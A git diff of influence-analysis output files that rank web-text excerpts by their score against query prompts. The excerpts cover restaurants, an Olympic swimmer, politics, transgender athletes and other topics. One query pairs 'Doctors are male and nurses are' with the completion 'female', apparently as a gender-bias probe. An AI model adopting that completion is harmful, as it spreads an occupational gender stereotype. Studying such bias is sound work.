text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 94; Score = 659456.0 +<|begin_of_text|>Enchiladas, Beans & Rice: Where To Find Retro Tex-Mex Combo Platters In Houston—Updated + +Anyone who has seen Ratatouille knows the famous scene when the movie’s namesake dish mentally transports a restaurant critic back to his childhood. Tex-Mex has the same effect on many longtime Houstonians. + +Truthfully, there are a lot of things to not like about the mess that we call “the combination dinner.” There’s too much salt, grease and no vegetables to speak of amid a wealth of artery-clogging cheese and meat. If an alien was dropped into Texas and served up a big ol’ mess of Tex-Mex, he might ask, “What the heck is this on my plate?” + +But for those of us who grew up here, Tex-Mex seems very right and we love it. As a kid, my family ate at an El Patio on Telephone at Park Place at least twice a week. + +Traditional combo plates include frijoles refritos (refried beans), arroz a la Mexicana (Mexican rice) and “gravy” made with flour, oil and chili powder to cover the enchiladas and tamales. Tortillas for enchiladas are dipped in hot oil to soften and then stacked until ready to use. The rice is slightly red from tomatoes, seasoned with cumin and—hopefully—light and fluffy. The beans—usually made from pinto beans cooked until very soft—may be watery or slightly thick. Very lucky diners will get to enjoy a fried taco shell that’s puffy, crispy and inflated like a balloon. (Los Tios and Fiesta Loma Linda are the only places that I know of that still do these). + +Updated, 7/24/2017: By reader request, here’s a map of all 12 old-school Tex-Mex restaurants recommended in this article. + +Here’s a list of 12 places that, if one could time-travel back to 1960s Houston, feature the combination plates that would have been served. In our city, Tex-Mex is a hotly debated topic and everyone has a favorite. If you don’t see yours, please feel free to add suggestions in the comments section! + +El Real Tex-Mex #7, 1201 Westheimer: Many of the recipes at El Real came from Robb Walsh’s The Tex-Mex Cookbook, which reflects his lifelong love affair with the history of and recipes of classic Tex-Mex. The flour and corn tortillas here are +================================================================================ +Rank = 95; Score = 659456.0 +<|begin_of_text|>Image copyright AFP Image caption A satisfied smile on the podium from Fu Yuanhui (left) + +All Olympians can enjoy the support of their home country, but the enthusiasm of one Chinese swimmer after winning a bronze has made her an overnight social media star, and is changing the view of competitive sport in the country, as the BBC's Yashan Zhao reports. + +"I have used all my prehistoric powers to swim," Fu Yuanhui said in an interview with CCTV5 after she qualified for the women's 100m backstroke final. + +When asked what her hopes were for the final, she said: "No expectation! I'm very satisfied now!" + +That's how she began to rock China's internet and social media. Add her exaggerated facial expressions and humour, and she quickly became an online celebrity. + +See all our Olympics coverage + +Image copyright CCTV-5/Miaopai 'Huangwen Yuxiaopenyou' Image caption Social media users (left) have copied Fu Yuanhui (right) after her enthusiastic CCTV interview + +She eventually won a bronze medal in the 100m backstroke final, not gold. But that hasn't reduced the affection from her fans. + +In fact, her fans on microblogging platform Sina Weibo have increased from a hundred thousand to four million over the past two days, and are still increasing. Many fans have also been sharing cute cartoons of Fu. + +'Everyone is talking about her' + +Young Chinese social media users have been drawn to her straight-forward character, her sincerity and her attitude towards competition. + +Image copyright Fu Yuanhui/Weibo Image caption One cartoon shared by Fu Yuanhui showed her exclaiming "I am so satisfied" + +Joanna Zhan, a fan in Chongqing, said she liked Fu because she is "so cute, and she is as powerful as a mudslide". + +"Fu interpreted the Olympic spirit of challenging herself and enjoying the game," she added. + +Chinese athletes traditionally follow a pattern in media interviews after they compete, thanking the country and vowing to do their best in the next competition. + +But Fu broke with tradition, showing her own happiness at her performance. + +Image copyright Reuters + +One fan, Feng Zhu, told the BBC she liked Fu because she always said exactly what was on her mind. + +JingYing Li, a female entrepreneur in Sichuan province, said she heard about Fu from her friends. "Almost everyone is talking about her," she said. + +Ms Li said her colleagues had all been sharing videos and articles about +================================================================================ +Rank = 96; Score = 655360.0 +<|begin_of_text|>Gov. Cuomo and Mayor de Blasio used threats and intimidation in recent days to block prominent Democrats from backing leftist law professors Zephyr Teachout and her running mate, Tim Wu, in Tuesday’s primary, party insiders have told The Post. + +The largely successful pressure has been especially intense to stop endorsements for Wu, who is given a real chance of defeating conservative-turned-“progressive” former upstate Rep. Kathy Hochul, Cuomo’s running mate for lieutenant governor, insiders said. + +“Cuomo and de Blasio were pulling out all stops, making it clear that anyone who even considers endorsing Teachout or Wu will pay a big political price,” said a prominent Democratic activist. + +“Cuomo especially is obsessed with Wu because he clearly thinks Wu has a chance to win, which would be a disaster for him,” the activist continued. + +City Council members were told that pet projects would be endangered if they back either Teachout or Wu, said a source close to the council. “You wouldn’t believe how much we were intimidated and muscled,’’ said one. + +Council members and state legislators were also warned that state-funded projects would be at risk if they publicly backed Teachout or Wu, several sources said. + +Delivering some of the messages was Joe Percoco, Cuomo’s longtime aide and political enforcer, the sources said. + +“It’s almost a running joke in Democratic circles with people who speak up for Teachout saying, ‘I’m about to get a call from Joe,’ ’’ said a Teachout-campaign insider. + +Cuomo himself was also described as directly involved. + +“A few days ago, Teachout received a call from someone she had hoped would endorse her saying, ‘I’m so sorry. I just got a call from the governor, and he mentioned a particular project that I’m interested in, and so I’m going to have to endorse him,’ ’’ the campaign insider said. + +Teachout told The Post, “When you speak to elected officials, they’re pretty blunt about wanting to protect their constituents from reprisals if they were to endorse me.” + +“I absolutely would have had the support of dozens of elected officials who have endorsed Cuomo if it wasn’t for that.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 97; Score = 655360.0 +<|begin_of_text|>Followup to: Humans in Funny Suits + +"Let me see if I understand your thesis. You think we shouldn't anthropomorphize people?" + +-- Sidney Morgenbesser to B. F. Skinner + +Behaviorism was the doctrine that it was unscientific for a psychologist to ascribe emotions, beliefs, thoughts, to a human being. After all, you can't directly observe anger or an intention to hit someone. You can only observe the punch. You may hear someone say "I'm angry!" but that's hearing a verbal behavior, not seeing anger. Thoughts are not observable, therefore they are unscientific, therefore they do not exist. Oh, you think you're thinking, but that's just a delusion - or it would be, if there were such things as delusions. + +This was before the day of computation, before the concept of information processing, before the "cognitive revolution" that led to the modern era. If you looked around for an alternative to behaviorism, you didn't find, "We're going to figure out how the mind processes information by scanning the brain, reading neurons, and performing experiments that test our hypotheses about specific algorithms." You found Freudian psychoanalysis. This may make behaviorism a bit more sympathetic. + +Part of the origin of behaviorism, was in a backlash against substance dualism - the idea that mind is a separate substance from ordinary physical phenomena. Today we would say, "The apparent specialness comes from the brain doing information-processing; a physical deed to be sure, but one of a different style from smashing a brick with a sledgehammer." The behaviorists said, "There is no mind." (John B. Watson, founder of behaviorism, in 1928.) + +The behaviorists outlawed not just dualistic mind-substance, but any such things as emotions and beliefs and intentions (unless defined in terms of outward behavior). After all, science had previously done away with angels, and de-gnomed the haunted mine. Clearly the method of reason, then, was to say that things didn't exist. Having thus fathomed the secret of science, the behaviorists proceeded to apply it to the mind. + +You might be tempted to say, "What fools! Obviously, the mind, like the rainbow, does exist; it is to be explained, not explained away. Saying 'the subject is angry' helps me predict the subject; the belief pays its rent. The hypothesis of anger is no different from any other scientific hypothesis." + +That's +================================================================================ +Rank = 98; Score = 655360.0 +<|begin_of_text|>For Hamilton fans asking “what comes next?” after the Broadway smash’s most recent King George, Rory O’Malley, performed his last show Sunday, Taran Killam has an answer. + +The former Saturday Night Live star, who will take over the role starting on Tuesday, shared a photo of himself in the mad king’s regal wardrobe on Instagram Monday. + +“King me. Tomorrow’s forecast: Reign. #Ramilton,” the star punnily captioned the image. + +While you might be saying, “I know him,” it’s not from Broadway — Killam will be making his Great White Way debut in the hip-hop musical, though he is an experienced musical theater actor. And if you’re perplexed and wondering if they’re going to keep on replacing whoever’s in charge, the answer is yes: Killam will be the fifth actor to wear the crown, after Brian d’Arcy James, Jonathan Groff, Andrew Rannells, and O’Malley. + +On Saturday, the production shared a digital #Ham4Ham video of Killam’s “coronation,” as O’Malley steps aside to play the monarch on the show’s first national tour and Killam ascends the throne in the Richard Rodgers Theatre. + +Groff previously performed the same ritual in April, when O’Malley assumed the role.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 99; Score = 655360.0 +<|begin_of_text|>Media playback is unsupported on your device Media caption Some of the passengers onboard took video footage of what it was like inside the Air India plane + +Passengers were stranded on a plane on the tarmac at Gatwick Airport for more than eight hours after fog caused their flight to be diverted. + +The Air India flight was on its way from Mumbai to Heathrow Airport when the weather conditions forced it to divert to Gatwick at about 08:00 BST. + +It resumed its journey at 17:00 BST, arriving at Heathrow 20 minutes later. + +A spokesman for the Sussex airport said the airline had to wait for a crew before it could complete its journey. + +Sussex Police were called to the flight to prevent a breach of the peace as tempers among passengers flared. + +'No food' + +A BBC World Service reporter on board said the mood on the plane became heated. + +Rahul Joglekar said he did not know why the passengers were prevented from disembarking the aircraft. + +Air India was unavailable for comment. + +Media playback is unsupported on your device Media caption The BBC's Rahul Joglekar, on board the stranded plane, said "tempers are running high" + +One passenger, Mark Shorey, said passengers were given a note of apology by the airline when they got off the plane at Heathrow, but that he was not satisfied with the response. + +He said: "I'm angry at just being in the dark and we still are. I don't really understand what happened today." + +Mr Shorey said: "I don't understand why we were diverted then not allowed to leave. I felt I was already home, I was in London, I didn't mind the extra hassle of coming from Gatwick into London." + +Jas Johal, who was also on the plane, said: "There were promises of food and refreshments on board. Everyone was very hungry. There was no sign of any food. I myself asked them several times, then they brought out some more crisps and Coke." + +He added: "By this time, after almost eight hours without any food, people were willing to lose their calmness." + +'Quite restless' + +Passenger Victoria Denham said she would be complaining to the airline and seeking compensation for the delay. + +Miss Denham, from Rotherham, said that when they landed at 0810 BST they were told they were just waiting for the fog to clear. + +More announcements followed saying the fog had not cleared to regulation levels, she said. + +"People started to get quite restless and talk to staff diff --git a/examples/openwebtext/files/doctor.txt b/examples/openwebtext/files/scores_raw/doctor.txt similarity index 88% rename from examples/openwebtext/files/doctor.txt rename to examples/openwebtext/files/scores_raw/doctor.txt index 3fb6415..b0a2a17 100644 --- a/examples/openwebtext/files/doctor.txt +++ b/examples/openwebtext/files/scores_raw/doctor.txt @@ -1,9 +1,9 @@ Query Sequence: -Prompt: Doctors are male and nurses are; Completion: female. +Prompt:Doctors are male and nurses are; Completion: female. Top Influential Sequences: ================================================================================ -Rank = 0; Score = 872448.0 +Rank = 0; Score = 446464.0 <|begin_of_text|>Citizens have 911. Employees have the EEOC. Distressed sailors have the Coast Guard. But what do America’s college students have? Where can they turn when they find themselves outside campus “safe spaces” and suffering a “microaggression”? @@ -20,16 +20,31 @@ For those unfamiliar with the apparently epidemic scale of microaggression and t The University of Arizona isn’t the first to suggest the “ouch”/”oops” protocol. Iowa State University, among others, has also urged a similar approach.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 1; Score = 503808.0 -<|begin_of_text|>Most Democrats want stricter gun laws, and most Republicans oppose them. So you might expect the election of Donald Trump and a Republican-controlled Congress to be great news for the nation’s gunmakers. But surprisingly, the opposite turned out to be the case. +Rank = 1; Score = 270336.0 +<|begin_of_text|>The issue is particularly nettlesome with individuals who have transitioned from male to female because of the belief that they might still have a physical advantage until their hormone therapy — which not every transgender person chooses to have — is complete. -Two of the nation’s biggest gun manufacturers, Smith & Wesson and Sturm Ruger, saw their stock prices fall by double digits this morning in the wake of Trump’s election victory. +“When you start talking about transgender athletes, a male-to-female individual, we want to ensure that that is truly a decision that is permanent,” said Bobby Cox, the commissioner of the Indiana High School Athletic Association. “It is not a decision that, ‘I just decided today that I am going to be a girl and I am going to go play on a girls’ team’ and perhaps, disadvantage those kids that are on the team and imbalance the competition. -Here’s one theory for what’s going on: In recent years, gun sales have been driven by fears of gun confiscations. Gun sales soared after Obama’s election in 2008 and again when he was reelected in 2012, as people worried that the president would begin to confiscate the nation’s firearms. +“And as we progress down this path,’’ he added, “and as we spend more time and energy with advocacy groups and medical professionals in this area, I think that there will be additional amendments to our policies.” -In contrast, gun owners have little to fear from a Trump presidency or a Republican Congress. So gunmakers are likely to make fewer sales over the next four years.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +There is no reliable data on the number of transgender high school athletes. Only about 0.6 percent of the adult population identifies as transgender, according to federal data from 2016. Researchers from the Williams Institute, who conducted the study, reported that 0.56 percent of adults in Indiana reported identifying as transgender. + +In Texas, 0.66 percent of adults said they identify as transgender, the fifth-highest percentage in the country (behind Hawaii, California, New Mexico and Georgia). Still, transgender children are considered an at-risk minority outside of sports. According to The New England Journal of Medicine, the rate of suicide attempts among transgender people is 40 percent, compared to 4.6 percent among those who are not transgender. + +Relatively new policies are already being massaged and amended. In July, the Indiana state association voted unanimously to adjust its surgery requirement. It now no longer requires transgender students who are transitioning from female to male to have sex reassignment surgery in order to compete in the gender with which they identify. But that stipulation is still in place for someone transitioning from male to female. + +The group asserts it is acting in the name of fairness, but transgender rights activists accuse members of simply not wanting transgender people to participate, out of fear that those athletes will have an unfair advantage.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 2; Score = 260096.0 +<|begin_of_text|>A connection between lesbian lust and identifying as male came to me after reading the prologue to Audre Lorde’s Zami : A New Spelling of My Name (full text here.) Lorde describes wanting to be both male and female and she fantasized about having a penis. It’s increasingly common for lesbians to think they are men so I think this needs to be discussed. In this post I’m going to describe my interpretation of Lorde’s quote, which was written in 1982, and then discuss the phenomenon of lesbians feeling “male” within the current context of porn culture and transgenderism. + +“I have always wanted to be both man and woman, to incorporate the strongest and richest parts of my mother and father within/into me—to share valleys and mountains upon my body the way the earth does in hills and peaks. I would like to enter a woman the way any man can, and to be entered—to leave and to be left—to be hot and hard and soft all at the same time in the cause of our loving. I would like to drive forward and at other times to rest or be driven. When I sit and play in the waters of my bath I love to feel the deep inside parts of me, sliding and folded and tender and deep. Other times I like to fantasize the core of it, my pearl, a protruding part of me, hard and sensitive and vulnerable in a different way. I have felt the age-old triangle of mother father and child, with the “I” at its eternal core, elongate and flatten out into the elegantly strong triad of grandmother mother daughter, with the “I” moving back and forth flowing in either or both directions as needed. Woman forever. My body, a living representation of other life older longer wiser. The mountains and valleys, trees, rocks. Sand and flowers and water and stone. Made in earth.”-Audre Lorde + +This quote is rather poetic and I have 